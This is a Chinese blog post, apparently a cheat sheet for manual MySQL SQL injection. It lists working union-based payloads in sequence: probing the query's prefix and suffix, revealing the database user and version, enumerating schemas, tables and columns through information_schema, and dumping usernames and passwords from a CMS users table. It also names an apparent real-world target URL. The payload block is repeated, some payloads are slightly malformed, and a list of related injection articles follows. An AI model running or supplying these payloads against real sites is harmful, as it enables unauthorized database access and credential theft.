mysql手工注入
2017-05-26 12:32
375 查看
//判断前缀与后缀
数字与字符型 'order by 1# 'and 's' IN ('swords')#
数字型 order by 1# //前缀为空,后缀为#
数字与字符 ')order by 1# ')&& 's' IN ('swords')#
//很少见 ")order by 1#
//确定字段数'order by $#后,id=-1' #进行U或E查询
//若有3个字段,确定显示位
//查看基本信息,确认是否是root
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//!root权限,爆出所有数据库名
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata#
//查询某个数据库下所有表,当前数据库用database(),0x7068706161是phpaa的hex编码
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161,
//查询某个表下的所有字段
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273
//查询数据
union select 1,2,group_concat(DISTINCT+user,0x3a,password)12,13,14,15 from phhaa.cms_users
http://m.yicp.com/news/newslist.php?categoryId=15
数字与字符型 'order by 1# 'and 's' IN ('swords')#
数字型 order by 1# //前缀为空,后缀为#
数字与字符 ')order by 1# ')&& 's' IN ('swords')#
//很少见 ")order by 1#
//确定字段数'order by $#后,id=-1' #进行U或E查询
//若有3个字段,确定显示位
//查看基本信息,确认是否是root
id=-1'union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5%23
//!root权限,爆出所有数据库名
id=-1'union select 1,2,3,unhex(hex(group_concat(schema_name))),5 from information_schema.schemata#
//查询某个数据库下所有表,当前数据库用database(),0x7068706161是phpaa的hex编码
union select 1,2,3,unhex(hex(group_concat(table_name))),5 from information_schema.tables where table_schema=0x7068706161,
//查询某个表下的所有字段
union select 1,2,unhex(hex(group_concat(column_name))),4 from information_schema.columns where
table_name=0x636D735F7573657273
//查询数据
union select 1,2,group_concat(DISTINCT+user,0x3a,password)12,13,14,15 from phhaa.cms_users
http://m.yicp.com/news/newslist.php?categoryId=15
相关文章推荐
- PHP+MySQL 手工注入语句
- PHP+MySQL 手工注入语句
- MSSQL与MYSQL手工注入时的简单对比
- mysql手工注入总结
- mysql 手工注入 字符类型
- PHP+MySQL 手工注入语句大全 推荐
- mysql手工注入
- Mysql数据库的mysql Schema 究竟有哪些东西& 手工注入的基础要领
- mysql-php基于“错误”的手工注入----(select *)
- MySQL 手工注入常用语句
- PHP+MySQL环境下的SQL手工注入教程
- MYSQL手工注入某日本网站
- php―mysql 5.0以上手工注入实战
- 记一次php手工注入(mysql)
- mysql -- 手工注入
- MySql 手工注入实战
- PHP+MySQL 手工注入语句大全
- MySQL手工注入步骤+直接写入一句话
- Mysql5.0以上 手工注入
- mysql手工注入总结